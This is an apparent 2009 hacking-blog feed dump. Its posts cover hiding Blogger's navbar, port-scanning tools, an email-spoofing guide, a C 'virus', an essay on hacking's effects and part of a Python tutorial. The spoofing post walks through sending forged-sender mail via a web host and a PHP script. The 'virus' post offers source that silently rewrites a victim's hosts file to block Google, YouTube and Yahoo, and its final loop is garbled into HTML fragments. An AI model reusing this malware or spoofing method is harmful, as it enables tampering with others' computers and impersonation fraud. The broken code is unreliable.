src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-2789244229062537929</id><published>2009-09-26T00:48:00.000-07:00</published><updated>2009-10-08T05:42:32.815-07:00</updated><title type='text'>How to hide "Navbar Blogger"</title><content type='html'>Before erasing navbar blogger (Navigation Bar), it’s better if I inform that this method is one of the Blogger TOS violation. If you still want to erase it, you can use the script below:&lt;br /&gt;&lt;br /&gt;/* CSS to hid navigation bar */&lt;br /&gt;&lt;br /&gt;#navbar {&lt;br /&gt;height:10px;&lt;br /&gt;visibility:hidden;&lt;br /&gt;display:none;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;How to do:&lt;br /&gt;In the Edit HTML page, put the &lt;span class="fullpost"&gt;code above under the code &lt;b:skin&gt;&lt;!--[CDATA[/* and then save template.    &lt;/span--&gt;&lt;/b:skin&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-2789244229062537929?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/2789244229062537929/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/09/how-to-hide-navbar-blogger.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/2789244229062537929'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/2789244229062537929'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/09/how-to-hide-navbar-blogger.html' title='How to hide &quot;Navbar Blogger&quot;'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-3567250839942623582</id><published>2009-09-13T07:58:00.000-07:00</published><updated>2009-10-08T05:42:10.477-07:00</updated><title type='text'>Port Scanning</title><content type='html'>Port Scanning is one of the most popular techniques used by hackers to discover services that can be compromised.&lt;br /&gt;&lt;br /&gt;    * A potential target computer runs many ’services’ that listen at ‘well-known’ ‘ports’.&lt;br /&gt;    * By scanning which ports are available on the &lt;span class="fullpost"&gt;&lt;br /&gt;victim, the hacker finds potential vulnerabilities that can be exploited.&lt;br /&gt;    * Scan techniques can be differentiated broadly into Vanilla, Strobe, Stealth, FTP Bounce, Fragmented Packets, Sweep and UDP Scans.&lt;br /&gt;&lt;br /&gt;Port Scanning Techniques&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Port Scanning Techniques can be broadly classified into:&lt;br /&gt;&lt;br /&gt;    * Open scan&lt;br /&gt;    * Half- open scan&lt;br /&gt;    * Stealth scan&lt;br /&gt;    * Sweeps&lt;br /&gt;    * Misc&lt;br /&gt;&lt;br /&gt;Commonly used tools for port scanning&lt;br /&gt;&lt;br /&gt;1.Tool: SuperScan 3.0&lt;br /&gt;&lt;br /&gt; &lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Dctv9GCvTgs/Sq0IyWCCX5I/AAAAAAAAAOI/faljpPDa-vI/s1600-h/superscan.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 286px;" src="http://3.bp.blogspot.com/_Dctv9GCvTgs/Sq0IyWCCX5I/AAAAAAAAAOI/faljpPDa-vI/s400/superscan.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5380966790778216338" /&gt;&lt;/a&gt;&lt;br /&gt; &lt;br /&gt;2. Tool: NMap (Network Mapper)&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Dctv9GCvTgs/Sq0JAzI5ifI/AAAAAAAAAOQ/6il8qRpsq9A/s1600-h/nmap1.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 354px;" src="http://4.bp.blogspot.com/_Dctv9GCvTgs/Sq0JAzI5ifI/AAAAAAAAAOQ/6il8qRpsq9A/s400/nmap1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5380967039109794290" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;3. Tool: NetScan Tools Pro 2003&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Dctv9GCvTgs/Sq0JJfybytI/AAAAAAAAAOY/QlTP8tEzlXo/s1600-h/netscan-tools.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 332px;" src="http://4.bp.blogspot.com/_Dctv9GCvTgs/Sq0JJfybytI/AAAAAAAAAOY/QlTP8tEzlXo/s400/netscan-tools.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5380967188534119122" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;4. Tool: ipEye, IPSecScan&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Dctv9GCvTgs/Sq0JWlciOiI/AAAAAAAAAOg/aEFexk9mQMg/s1600-h/ipeye.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 192px;" src="http://4.bp.blogspot.com/_Dctv9GCvTgs/Sq0JWlciOiI/AAAAAAAAAOg/aEFexk9mQMg/s400/ipeye.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5380967413391178274" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-3567250839942623582?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/3567250839942623582/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/09/port-scanning.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/3567250839942623582'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/3567250839942623582'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/09/port-scanning.html' title='Port Scanning'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_Dctv9GCvTgs/Sq0IyWCCX5I/AAAAAAAAAOI/faljpPDa-vI/s72-c/superscan.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-6972325266320220518</id><published>2009-09-13T07:55:00.000-07:00</published><updated>2009-10-08T05:41:58.084-07:00</updated><title type='text'>How To Send Anonymous Emails</title><content type='html'>Most of us are very curious to know a method to send anonymous emails to our friends for fun. But the question is, is it possible to send anonymous emails in spite of the advanced spam filtering technology adopted by email service provides like Gmail, Yahoo etc? The answer is YES, it is still possible to bypass their spam filters and send anonymous emails to your friends. For example, you can send an email to your friend with &lt;span class="fullpost"&gt;the following sender details.&lt;br /&gt;&lt;br /&gt;From: Bill Gates &lt;billg@microsoft.com&gt;&lt;br /&gt;&lt;br /&gt;The art of sending this kind emails is known as Email Spoofing. In my previous post on How to Send Fake Email I insisted on using your own SMTP server to send anonymous emails. This method used to work successfully in the past, but today it has a very low success rate since Gmail and Yahoo(all major email service providers) blocks the emails that are sent directly from a PC. In this post I have come up with a new way to send anonymous emails (spoofed emails) that has 100% success rate. If you have to successfully send an anonymous email or spoofed email, you should send it using a relay server.&lt;br /&gt;&lt;br /&gt;What is a Relay Server?&lt;br /&gt;&lt;br /&gt;In simple words, a relay server is an SMTP Server that is trusted by Google or Yahoo as an authorised sender of the email. So, when you send an email using a relay server, the email service providers like Yahoo and Gmail blindly accept the emails and deliver it to the inbox of the recipient. If the SMTP server is not authorised, Google and Yahoo will reject all the emails sent from this SMTP server. This is the reason for which using our own SMTP server to send emails fail. &lt;br /&gt;&lt;br /&gt;So What’s Next?&lt;br /&gt;&lt;br /&gt;Now all we have to do is, find a trusted SMTP server to Send Spoofed Emails. Usually all the emails that are sent from web hosting providers are trusted and authorised. So, you have to find a free web hosting provider that allows you to send emails. But, most of the free Web Hosts disable the Mail feature and do not allow the users to send emails. This is done just to avoid spamming. However all the paid hosting plans allow you to send any number of emails. Once you find a hosting service that allows to send emails from their servers, it’s just a cakewalk to send anonymous emails. All we have to do is just modify the email headers to insert the spoofed From address field into it.&lt;br /&gt;&lt;br /&gt;I have created a PHP script that allows you to send emails from any name and email address of your choice. The script can be found here.&lt;br /&gt;&lt;br /&gt;Anonymous Email Sender Script&lt;br /&gt;&lt;br /&gt; Here is a step-by-step procedure to setup your own Anonymous Email Sender Script&lt;br /&gt;&lt;br /&gt;1. Goto X10 Hosting  and register a new account.&lt;br /&gt;&lt;br /&gt;2. Download my Anonymous Email Sender Script (sendmail.rar).&lt;br /&gt;&lt;br /&gt;3. Login to your FreeWebHostingArea Account and click on File Manager.&lt;br /&gt;&lt;br /&gt;4. Upload the sendmail.php, pngimg.php and bg1.PNG files to the server.&lt;br /&gt;&lt;br /&gt;5. Set permissions for sendmail.php, pngimg.php and bg1.PNG to 777.&lt;br /&gt;&lt;br /&gt;6. Now type the following URL&lt;br /&gt;&lt;br /&gt;http://yoursite.x10hosting.com/sendmail.php&lt;br /&gt;&lt;br /&gt;NOTE: yoursite must be substituted by the name of the subdomain that you have chosen during the registration process.&lt;br /&gt;&lt;br /&gt;7. Use the script to send Anonymous Emails. Enjoy!!!&lt;br /&gt;&lt;br /&gt;Tell me whether it worked or not. Please pass your comments…&lt;br /&gt;&lt;br /&gt;WARNING: ALL THE INFORMATION PROVIDED IN THIS POST ARE FOR EDUCATIONAL PURPOSE ONLY. I AM NOT RESPONSIBLE FOR ANY MISUSE.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-6972325266320220518?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/6972325266320220518/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/09/how-to-send-anonymous-emails.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/6972325266320220518'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/6972325266320220518'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/09/how-to-send-anonymous-emails.html' title='How To Send Anonymous Emails'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-702006068412055901</id><published>2009-09-13T07:52:00.000-07:00</published><updated>2009-10-08T05:41:45.121-07:00</updated><title type='text'>A Virus Program to Block Websites</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Dctv9GCvTgs/Sq0HYvRYw7I/AAAAAAAAAOA/UHEVy4ZO0H8/s1600-h/firefox-blocked.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 300px; height: 286px;" src="http://2.bp.blogspot.com/_Dctv9GCvTgs/Sq0HYvRYw7I/AAAAAAAAAOA/UHEVy4ZO0H8/s320/firefox-blocked.jpg" alt="" id="BLOGGER_PHOTO_ID_5380965251365258162" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into &lt;span class="fullpost"&gt;the technical jargon.&lt;br /&gt;&lt;br /&gt;This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.&lt;br /&gt;&lt;br /&gt;NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website ?&lt;br /&gt;&lt;br /&gt;Here is the sourcecode of the virus.&lt;br /&gt;&lt;br /&gt;#include&lt;stdio.h&gt;&lt;br /&gt;#include&lt;dos.h&gt;&lt;br /&gt;#include&lt;dir.h&gt;&lt;br /&gt;&lt;br /&gt;char site_list[6][30]={&lt;br /&gt;“google.com”,&lt;br /&gt;“www.google.com”,&lt;br /&gt;“youtube.com”,&lt;br /&gt;“www.youtube.com”,&lt;br /&gt;“yahoo.com”,&lt;br /&gt;“www.yahoo.com”&lt;br /&gt;};&lt;br /&gt;char ip[12]=”127.0.0.1″;&lt;br /&gt;FILE *target;&lt;br /&gt;&lt;br /&gt;int find_root(void);&lt;br /&gt;void block_site(void);&lt;br /&gt;&lt;br /&gt;int find_root()&lt;br /&gt;{&lt;br /&gt;int done;&lt;br /&gt;struct ffblk ffblk;//File block structure&lt;br /&gt;&lt;br /&gt;done=findfirst(”C:\\windows\\system32\\drivers\\etc\\hosts”,&amp;amp;ffblk,FA_DIREC);&lt;br /&gt;/*to determine the root drive*/&lt;br /&gt;if(done==0)&lt;br /&gt;{&lt;br /&gt;target=fopen(”C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);&lt;br /&gt;/*to open the file*/&lt;br /&gt;return 1;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;done=findfirst(”D:\\windows\\system32\\drivers\\etc\\hosts”,&amp;amp;ffblk,FA_DIREC);&lt;br /&gt;/*to determine the root drive*/&lt;br /&gt;if(done==0)&lt;br /&gt;{&lt;br /&gt;target=fopen(”D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);&lt;br /&gt;/*to open the file*/&lt;br /&gt;return 1;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;done=findfirst(”E:\\windows\\system32\\drivers\\etc\\hosts”,&amp;amp;ffblk,FA_DIREC);&lt;br /&gt;/*to determine the root drive*/&lt;br /&gt;if(done==0)&lt;br /&gt;{&lt;br /&gt;target=fopen(”E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);&lt;br /&gt;/*to open the file*/&lt;br /&gt;return 1;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;done=findfirst(”F:\\windows\\system32\\drivers\\etc\\hosts”,&amp;amp;ffblk,FA_DIREC);&lt;br /&gt;/*to determine the root drive*/&lt;br /&gt;if(done==0)&lt;br /&gt;{&lt;br /&gt;target=fopen(”F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);&lt;br /&gt;/*to open the file*/&lt;br /&gt;return 1;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;else return 0;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;void block_site()&lt;br /&gt;{&lt;br /&gt;int i;&lt;br /&gt;fseek(target,0,SEEK_END); /*to move to the end of the file*/&lt;br /&gt;&lt;br /&gt;fprintf(target,”\n”);&lt;br /&gt;for(i=0;i&lt;6;i++) success="0;" success="find_root();"&gt;&lt;/dos.h&gt;&lt;/stdio.h&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-702006068412055901?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/702006068412055901/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/09/virus-program-to-block-websites.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/702006068412055901'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/702006068412055901'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/09/virus-program-to-block-websites.html' title='A Virus Program to Block Websites'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_Dctv9GCvTgs/Sq0HYvRYw7I/AAAAAAAAAOA/UHEVy4ZO0H8/s72-c/firefox-blocked.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-385642134751263352</id><published>2009-09-07T07:04:00.001-07:00</published><updated>2009-10-08T05:41:28.976-07:00</updated><title type='text'>What are the Effects of Computer Hacking</title><content type='html'>Computer hacking is the act of modifying computer hardware or software, in order to cause damage to sensitive data on a computer or to simply steal confidential information. Computer hackers often target home and office computers that are connected to the Internet. The Internet is a gateway for a computer to connect to the world, which also makes it vulnerable to attacks from hackers from across the globe. What are the &lt;span class="fullpost"&gt;consequences of computer hacking? Let us find out.&lt;br /&gt;&lt;br /&gt;Effects of Computer Hacking&lt;br /&gt;&lt;br /&gt;Computer hacking is a breach of computer security. It can expose sensitive user data and risk user privacy. Hacking activities expose confidential user information like personal details, social security numbers, credit card numbers, bank account data and personal photographs. User information, in the hands of computer hackers, makes it vulnerable to illegitimate use and manipulation.&lt;br /&gt;&lt;br /&gt;Hackers may even delete sensitive information on gaining access to it. Deletion or manipulation of sensitive data with intent to achieve personal gain is another effect of computer hacking. A user whose computer has been hacked is at the risk of losing all the data stored on his/her computer. Manipulation of sensitive user data is a grave consequence of hacking.&lt;br /&gt;&lt;br /&gt;Identity theft is another important consequence of computer hacking. Identity theft is a fraud that involves pretension to be someone else, with intent to gain unauthorized access to information or property. It refers to an illegal use of someone else's identity for personal interest or gain.&lt;br /&gt;&lt;br /&gt;The advances in technology have led to the evolution of key-logging software, which is capable of tracking and recording every key stroke by the user, thereby stealing passwords and account details. Another serious effect of computer hacking is the denial of service attack. The DOS attack, as it is called, refers to the attempt of making computer resources unavailable to authorized users. Often, websites fall prey to denial-of-service attacks, whereby they are made unavailable for long periods of time, causing inconvenience to users while also hampering website business.&lt;br /&gt;&lt;br /&gt;Computer hacking can lead to theft of critical business information. Important information about business clients and customers can be lost or manipulated through computer hacking. Hacking can expose email addresses to hackers, which they might use for spamming and hampering email privacy.&lt;br /&gt;&lt;br /&gt;Information critical to national security, confidential government data, information related to national defense, security and crime, if exposed by means of hacking, can have grave consequences on the welfare of the nation. Hacking of highly sensitive data can potentially risk the national security and stake the overall well-being of the country's citizens.&lt;br /&gt;&lt;br /&gt;Hacking can be used to convert computers into zombies i.e. Internet-enabled computers that are compromised by hackers or computer viruses. Zombie computers are used for fraudulent activities like spamming and phishing.&lt;br /&gt;&lt;br /&gt;How can you find out whether your computer has been hacked? An unexplained decline in computer performance, an unexpected increase in file size, unexplained modifications to files, sudden changes in network settings of the computer and frequent disk crashes are some of the warning signs of a hacked computer. Installing reliable antivirus softwares, enabling a firewall before connecting to the Internet and installing operating system updates on a regular basis, can help help you combat hackers.&lt;br /&gt;&lt;br /&gt;What could happen to you in case you hack a computer? Well, computer users have a right to secure personal information under the data protection act. Not abiding by this act can have serious consequences like heavy fines or imprisonment. The degree of punishment depends on the severity of the damage resulting from computer hacking. Hacking is a computer crime.&lt;br /&gt;&lt;br /&gt;If only one could 'hack the brains' of hackers and 'delete' such destructive thoughts of hacking from their minds...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-385642134751263352?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/385642134751263352/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/09/what-are-effects-of-computer-hacking.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/385642134751263352'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/385642134751263352'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/09/what-are-effects-of-computer-hacking.html' title='What are the Effects of Computer Hacking'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-6831734436920996623</id><published>2009-09-07T06:53:00.000-07:00</published><updated>2009-10-08T05:41:11.300-07:00</updated><title type='text'>Instant Hacking</title><content type='html'>[If you like this tutorial, please check out my book Beginning Python, or perhaps become my fan on Facebook?]&lt;br /&gt;&lt;br /&gt;This is a short introduction to the art of programming, with examples written in the programming language Python. (If you already know how to program, but want a short intro to Python, you may want to check out my &lt;span class="fullpost"&gt;article Instant Python.) This article has been translated into Italian, Polish, Japanese, Serbian, Brazilian Portuguese, and Dutch, and is in the process of being translated into Korean.&lt;br /&gt;&lt;br /&gt;This page is not about breaking into other people’s computer systems etc. I’m not into that sort of thing, so please don’t email me about it.&lt;br /&gt;&lt;br /&gt;Note: To get the examples working properly, write the programs in a text file and then run that with the interpreter; do not try to run them directly in the interactive interpreter — not all of them will work. (Please don’t ask me on details on this. Check the documentation or send an email to help@python.org).&lt;br /&gt;The Environment&lt;br /&gt;&lt;br /&gt;To program in Python, you must have an interpreter installed. It exists for most platforms (including Macintosh, Unix and Windows). More information about this can be found on the Python web site. You also should have a text editor (like emacs, notepad or something similar).&lt;br /&gt;What is Programming?&lt;br /&gt;&lt;br /&gt;Programming a computer means giving it a set of instructions telling it what to do. A computer program in many ways resembles recipes, like the ones we use for cooking. For example [1]:&lt;br /&gt;&lt;br /&gt;Fiesta SPAM Salad&lt;br /&gt;&lt;br /&gt;Ingredients:&lt;br /&gt;&lt;br /&gt;Marinade:&lt;br /&gt;1/4 cup lime juice&lt;br /&gt;1/4 cup low-sodium soy sauce&lt;br /&gt;1/4 cup water&lt;br /&gt;1 tablespoon vegetable oil&lt;br /&gt;3/4 teaspoon cumin&lt;br /&gt;1/2 teaspoon oregano&lt;br /&gt;1/4 teaspoon hot pepper sauce&lt;br /&gt;2 cloves garlic, minced&lt;br /&gt;&lt;br /&gt;Salad:&lt;br /&gt;1 (12-ounce) can SPAM Less Sodium luncheon meat,&lt;br /&gt;    cut into strips&lt;br /&gt;1 onion, sliced&lt;br /&gt;1 bell pepper, cut in strips&lt;br /&gt;Lettuce&lt;br /&gt;12 cherry tomatoes, halved&lt;br /&gt;&lt;br /&gt;Instructions:&lt;br /&gt;&lt;br /&gt;In jar with tight-fitting lid, combine all marinade ingredients;&lt;br /&gt;shake well. Place SPAM strips in plastic bag. Pour marinade&lt;br /&gt;over SPAM. Seal bag; marinate 30 minutes in refrigerator.&lt;br /&gt;Remove SPAM from bag; reserve 2 tablespoons marinade. Heat&lt;br /&gt;reserved marinade in large skillet. Add SPAM, onion, and&lt;br /&gt;green pepper. Cook 3 to 4 minutes or until SPAM is heated.&lt;br /&gt;Line 4 individual salad plates with lettuce. Spoon hot salad&lt;br /&gt;mixture over lettuce. Garnish with tomato halves. Serves 4.&lt;br /&gt;&lt;br /&gt;Of course, no computer would understand this… And most computers wouldn’t be able to make a salad even if they did understand the recipe. So what do we have to do to make this more computer-friendly? Well — basically two things. We have to (1) talk in a way that the computer can understand, and (2) talk about things that it can do something with.&lt;br /&gt;&lt;br /&gt;The first point means that we have to use a language — a programming language that we have an interpreter program for, and the second point means that we can’t expect the computer to make a salad — but we can expect it to add numbers, write things to the screen etc.&lt;br /&gt;Hello…&lt;br /&gt;&lt;br /&gt;There’s a tradition in programming tutorials to always begin with a program that prints “Hello, world!” to the screen. In Python, this is quite simple:&lt;br /&gt;&lt;br /&gt;print "Hello, world!"&lt;br /&gt;&lt;br /&gt;This is basically like the recipe above (although it is much shorter!). It tells the computer what to do: To print “Hello, world!”. Piece of cake. What if we would want it to do more stuff?&lt;br /&gt;&lt;br /&gt;print "Hello, world!"&lt;br /&gt;print "Goodbye, world!"&lt;br /&gt;&lt;br /&gt;Not much harder, was it? And not really very interesting… We want to be able to do something with the ingredients, just like in the spam salad. Well — what ingredients do we have? For one thing, we have strings of text, like "Hello, world!", but we also have numbers. Say we wanted the computer to calculate the area of a rectangle for us. Then we could give it the following little recipe:&lt;br /&gt;&lt;br /&gt;# The Area of a Rectangle&lt;br /&gt;&lt;br /&gt;# Ingredients:&lt;br /&gt;&lt;br /&gt;width = 20&lt;br /&gt;height = 30&lt;br /&gt;&lt;br /&gt;# Instructions:&lt;br /&gt;&lt;br /&gt;area = width*height&lt;br /&gt;print area&lt;br /&gt;&lt;br /&gt;You can probably see the similarity (albeit slight) to the spam salad recipe. But how does it work? First of all, the lines beginning with # are called comments and are actually ignored by the computer. However, inserting small explanations like this can be important in making your programs more readable to humans.&lt;br /&gt;&lt;br /&gt;Now, the lines that look like foo = bar are called assignments. In the case of width = 20 we tell the computer that the width should be 20 from this point on. What does it mean that “the width is 20”? It means that a variable by the name “width” is created (or if it already exists, it is reused) and given the value 20. So, when we use the variable later, the computer knows its value. Thus,&lt;br /&gt;&lt;br /&gt;width*height&lt;br /&gt;&lt;br /&gt;is essentially the same as&lt;br /&gt;&lt;br /&gt;20*30&lt;br /&gt;&lt;br /&gt;which is calculated to be 600, which is then assigned to the variable by the name “area”. The final statement of the program prints out the value of the variable “area”, so what you see when you run this program is simply&lt;br /&gt;&lt;br /&gt;600&lt;br /&gt;&lt;br /&gt;Note: In some languages you have to tell the computer which variables you need at the beginning of the program (like the ingredients of the salad) — Python is smart enough to figure this out as it goes along.&lt;br /&gt;Feedback&lt;br /&gt;&lt;br /&gt;OK. Now you can perform simple, and even quite advanced calculations. For instance, you might want to make a program to calculate the area of a circle instead of a rectangle:&lt;br /&gt;&lt;br /&gt;radius = 30&lt;br /&gt;&lt;br /&gt;print radius*radius*3.14&lt;br /&gt;&lt;br /&gt;However, this is not significantly more interesting than the rectangle program. At least not in my opinion. It is somewhat inflexible. What if the circle we were looking at had a radius of 31? How would the computer know? It’s a bit like the part of the salad recipe that says: “Cook 3 to 4 minutes or until SPAM is heated.” To know when it is cooked, we have to check. We need feedback, or input. How does the computer know the radius of our circle? It too needs input… What we can do is to tell it to check the radius:&lt;br /&gt;&lt;br /&gt;radius = input("What is the radius?")&lt;br /&gt;&lt;br /&gt;print radius*radius*3.14&lt;br /&gt;&lt;br /&gt;Now things are getting snazzy… input is something called a function. (You’ll learn to create your own in a while. input is a function that is built into the Python language.) Simply writing&lt;br /&gt;&lt;br /&gt;input&lt;br /&gt;&lt;br /&gt;won’t do much… You have to put a pair of parantheses at the end of it. So input() would work — it would simply wait for the user to enter the radius. The version above is perhaps a bit more user-friendly, though, since it prints out a question first. When we put something like the question-string “What is the radius?” between the parentheses of a function call it is called passing a parameter to the function. The thing (or things) in the parentheses is (or are) the parameter(s). In this case we pass a question as a parameter so that input knows what to print out before getting the answer from the user.&lt;br /&gt;&lt;br /&gt;But how does the answer get to the radius variable? The function input, when called, returns a value (like many other functions). You don’t have to use this value, but in our case, we want to. So, the following two statements have very different meanings:&lt;br /&gt;&lt;br /&gt;foo = input&lt;br /&gt;&lt;br /&gt;bar = input()&lt;br /&gt;&lt;br /&gt;foo now contains the input function itself (so it can actually be used like foo("What is your age?"); this is called a dynamic function call) while bar contains whatever is typed in by the user.&lt;br /&gt;Flow&lt;br /&gt;&lt;br /&gt;Now we can write programs that perform simple actions (arithmetic and printing) and that can receive input from the user. This is useful, but we are still limited to so-called sequential execution of the commands, that is — they have to be executed in a fixed order. Most of the spam salad recipe is sequential or linear like that. But what if we wanted to tell the computer how to check on the cooked spam? If it is heated, then it should be removed from the oven — otherwise, it should be cooked for another minute or so. How do we express that?&lt;br /&gt;&lt;br /&gt;What we want to do, is to control the flow of the program. It can go in two directions — either take out the spam, or leave it in the oven. We can choose, and the condition is whether or not it is properly heated. This is called conditional execution. We can do it like this:&lt;br /&gt;&lt;br /&gt;temperature = input("What is the temperature of the spam?")&lt;br 